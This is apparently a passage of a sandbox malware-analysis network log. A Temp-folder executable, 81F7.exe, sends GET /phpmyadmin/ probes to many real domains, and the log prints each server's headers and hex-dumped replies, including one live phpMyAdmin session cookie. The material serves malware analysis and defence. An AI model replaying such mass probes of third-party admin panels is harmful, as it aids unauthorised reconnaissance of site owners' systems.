67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxco

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.6	51824	208.109.43.169	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:05 UTC	179	OUT	GET /phpmyadmin/ HTTP/1.1 Host: waukesha-water.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:05 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:05 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-02-20 23:26:05 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.6	51944	185.230.63.107	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:05 UTC	178	OUT	GET /phpmyadmin/ HTTP/1.1 Host: sportclinic.co.il Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:05 UTC	782	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:05 GMT Content-Type: text/html; charset=utf-8 Connection: close x-wix-request-id: 1708471565.2501478442704122157 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42 X-Seen-By: vmPhUNXuQemvc7fjBI8NWewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLseIu4dGXwqDk+m1otFKtK/V0TBmJ+uLPQ4OZPC1VSMH,2d58ifebGbosy5xc+FRalot867MtYSc3APbnkd7f9Dpb3SW7+008Ar5bJO2TG+4Wpt6ND/sSN7Q26K/LDtWcVA==,2UNV7KOq4oGjA5+PKsX47K0eODJntj8FkQmv0QgFYbsfbJaKSXYQ/lskq2jK6SGP,prnV6gMCdbwFzlCPEq+2AB4gj9IPM3/8Ir5L1DmRssE=,GCZRqREx605Y6yDgjOvSr0gzVvd88M9o49AqjE+T7lA=,/j+AjfLiOiE0Vc9NsP8sK9OGBA8EjSrrb+o8MGqPfV+fyFdu1BpPpgIayAnxFT6M+El08WdAlazUFNCK4dJeYQ== Vary: Accept-Encoding X-Content-Type-Options: nosniff Transfer-Encoding: chunked
2024-02-20 23:26:05 UTC	404	IN	Data Raw: 62 66 31 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 Data Ascii: bf1 ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" c
2024-02-20 23:26:05 UTC	2372	IN	Data Raw: 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 77 69 78 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 66 6f 6e 74 73 2f 48 65 6c 76 65 74 69 63 61 2f 66 6f 6e 74 46 61 63 65 Data Ascii: device-width"> <meta name="robots" content="noindex, nofollow"> ... --> <link type="image/png" href="//www.wix.com/favicon.ico" rel="shortcut icon"> ... --> <link href="//static.parastorage.com/services/third-party/fonts/Helvetica/fontFace
2024-02-20 23:26:05 UTC	293	IN	Data Raw: 43 6f 6e 6e 65 63 74 59 6f 75 72 44 6f 6d 61 69 6e 20 6f 63 63 75 72 72 65 64 3c 2f 68 31 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 6e 2d 61 6e 67 75 6c 61 72 2d 73 75 70 70 6f 72 74 65 64 2d 62 72 6f 77 73 65 72 2d 6c 69 6e 6b 22 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 3e 52 65 67 61 72 64 6c 65 73 73 2c 20 77 65 20 72 65 63 6f 6d 6d 65 6e 64 20 79 6f 75 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 72 6f 77 73 65 68 61 70 70 79 2e 63 6f 6d 2f 22 3e 75 70 64 61 74 65 20 79 6f 75 72 20 62 72 6f 77 73 65 72 2e 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 21 2d 2d 20 65 6e 64 20 76 65 Data Ascii: ConnectYourDomain occurred</h1> <div class="non-angular-supported-browser-link"> <span>Regardless, we recommend you to <a href="http://browsehappy.com/">update your browser.</a></span> </div> </div></div>... verification -->... end ve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.6	51899	185.107.56.198	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:05 UTC	171	OUT	GET /phpmyadmin/ HTTP/1.1 Host: att.com.ph Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:05 UTC	451	IN	HTTP/1.1 200 OK accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile cache-control: max-age=0, private, must-revalidate connection: close content-length: 483 content-type: text/html; charset=utf-8 date: Tue, 20 Feb 2024 23:26:04 GMT server: Cowboy set-cookie: sid=6b0df744-d047-11ee-8e72-b2efa92a5eb7; path=/; domain=.att.com.ph; expires=Mon, 10 Mar 2092 02:40:12 GMT; max-age=2147483647; secure; HttpOnly
2024-02-20 23:26:05 UTC	483	IN	Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 73 3a 2f 2f 61 74 74 2e 63 6f 6d 2e 70 68 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 3f 63 68 3d 31 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 63 77 4f 44 51 33 4f 44 63 32 4e 53 77 69 61 57 46 30 49 6a 6f 78 4e 7a 41 34 4e 44 63 78 4e 54 59 31 4c 43 4a 70 63 33 4d 69 4f Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('https://att.com.ph/phpmyadmin/?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcwODQ3ODc2NSwiaWF0IjoxNzA4NDcxNTY1LCJpc3MiO

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.6	51827	185.230.63.186	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:05 UTC	176	OUT	GET /phpmyadmin/ HTTP/1.1 Host: touktoukcie.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:05 UTC	781	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:05 GMT Content-Type: text/html; charset=utf-8 Connection: close x-wix-request-id: 1708471565.208147471428315208 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42 X-Seen-By: pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLqe0L1PnLg6FLWqrGNmqNwAa0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRals3RSyxx0MYg4GGADVIZ9NswkVZ0a/Kpm8IhOVV/2MClh3tjO0FmbCcRdHpQIhsFCg==,2UNV7KOq4oGjA5+PKsX47Ad3BAkeAb9lWxcyN70+/DFYgeUJqUXtid+86vZww+nL,oeCSbq11YyM2LrWdre0MiAPBzEMPrQyi9uZsFRcWByA=,3+SKj2WaFkDLVdR9vyo8lJ/76x7/stiZn8lkJEBHkQI=,/j+AjfLiOiE0Vc9NsP8sK4wRwdsym/8rjzUP5A/qGmXyEPhhqrz5x6CGm56MeUd2/64sEjeNjExOBUpktkI8WA== Vary: Accept-Encoding X-Content-Type-Options: nosniff Transfer-Encoding: chunked
2024-02-20 23:26:05 UTC	405	IN	Data Raw: 62 66 30 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 Data Ascii: bf0 ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" c
2024-02-20 23:26:05 UTC	2372	IN	Data Raw: 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 77 69 78 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 66 6f 6e 74 73 2f 48 65 6c 76 65 74 69 63 61 2f 66 6f 6e 74 46 61 63 65 2e Data Ascii: evice-width"> <meta name="robots" content="noindex, nofollow"> ... --> <link type="image/png" href="//www.wix.com/favicon.ico" rel="shortcut icon"> ... --> <link href="//static.parastorage.com/services/third-party/fonts/Helvetica/fontFace.
2024-02-20 23:26:05 UTC	291	IN	Data Raw: 6e 6e 65 63 74 59 6f 75 72 44 6f 6d 61 69 6e 20 6f 63 63 75 72 72 65 64 3c 2f 68 31 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 6e 2d 61 6e 67 75 6c 61 72 2d 73 75 70 70 6f 72 74 65 64 2d 62 72 6f 77 73 65 72 2d 6c 69 6e 6b 22 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 3e 52 65 67 61 72 64 6c 65 73 73 2c 20 77 65 20 72 65 63 6f 6d 6d 65 6e 64 20 79 6f 75 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 72 6f 77 73 65 68 61 70 70 79 2e 63 6f 6d 2f 22 3e 75 70 64 61 74 65 20 79 6f 75 72 20 62 72 6f 77 73 65 72 2e 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 21 2d 2d 20 65 6e 64 20 76 65 72 69 Data Ascii: nnectYourDomain occurred</h1> <div class="non-angular-supported-browser-link"> <span>Regardless, we recommend you to <a href="http://browsehappy.com/">update your browser.</a></span> </div> </div></div>... verification -->... end veri

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.6	51803	15.197.204.56	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:05 UTC	171	OUT	GET /phpmyadmin/ HTTP/1.1 Host: att.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:05 UTC	877	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:05 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_FbvEMrqsjKDRC9ThXAI+DHFNBovSsQ9JlX1bqPEGbPfUeADVtOBl/ZpevJZx36NBIs42EKJzgq2gvP+iLGYzkQ Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parking;Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:05 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.6	50982	13.248.169.48	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:05 UTC	175	OUT	GET /phpmyadmin/ HTTP/1.1 Host: acidvision.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:05 UTC	879	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:05 GMT Content-Type: text/html Content-Length: 315 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-13b" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_BDUQHvR3aSk/dKhqoigTWwdJB04vMILF53k8X8LOISPmcQ+M9TXCShVuhDX0F6dSwIYaLnTzM9TKVlGh0O2AoA Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:05 UTC	315	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 70 61 72 6b 69 6e 67 2d 6c 61 6e 64 65 72 2f 73 74 61 74 69 63 2f 6a 73 2f 66 6f 72 77 61 72 64 65 72 2e 39 39 36 32 64 30 30 30 2e 6a Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.j

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.6	51742	20.75.101.58	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:05 UTC	171	OUT	GET /phpmyadmin/ HTTP/1.1 Host: att.com.sg Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:05 UTC	176	IN	HTTP/1.1 404 Not Found Server: Microsoft-Azure-Application-Gateway/v2 Date: Tue, 20 Feb 2024 23:26:05 GMT Content-Type: text/html Content-Length: 179 Connection: close
2024-02-20 23:26:05 UTC	179	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 4d 69 63 72 6f 73 6f 66 74 2d 41 7a 75 72 65 2d 41 70 70 6c 69 63 61 74 69 6f 6e 2d 47 61 74 65 77 61 79 2f 76 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>Microsoft-Azure-Application-Gateway/v2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.6	52246	78.47.2.70	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:05 UTC	183	OUT	GET /phpmyadmin/ HTTP/1.1 Host: breecetechnology.co.za Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:05 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:05 GMT Server: Apache Content-Length: 269 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-02-20 23:26:05 UTC	269	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 62 72 65 65 63 65 74 65 63 68 6e 6f 6c 6f 67 79 2e 63 6f 2e 7a 61 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at breecetechnology.co.za Port 443</address><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.6	51754	104.21.54.169	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:05 UTC	184	OUT	GET /phpmyadmin/ HTTP/1.1 Host: fortressrealcapital.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:05 UTC	1342	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:05 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close x-ob_mode: 1 x-frame-options: DENY referrer-policy: no-referrer content-security-policy: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;style-src 'self' 'unsafe-inline' ;img-src 'self' data: .tile.openstreetmap.org;object-src 'none'; x-content-security-policy: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: .tile.openstreetmap.org;object-src 'none'; x-webkit-csp: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none'; x-xss-protection: 1; mode=block x-content-type-options: nosniff x-permitted-cross-domain-policies: none x-robots-tag: noindex, nofollow expires: Tue, 20 Feb 2024 23:26:05 +0000 Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0 pragma: no-cache vary: Accept-Encoding set-cookie: pma_lang_https=en; expires=Thu, 21-Mar-2024 23:26:05 GMT; Max-Age=2592000; path=/phpmyadmin/; secure; HttpOnly; SameSite=Strict set-cookie: phpMyAdmin_https=thvdkd6ka048si3epmtvilp7ef; path=/phpmyadmin/; secure; HttpOnly; SameSite=Strict
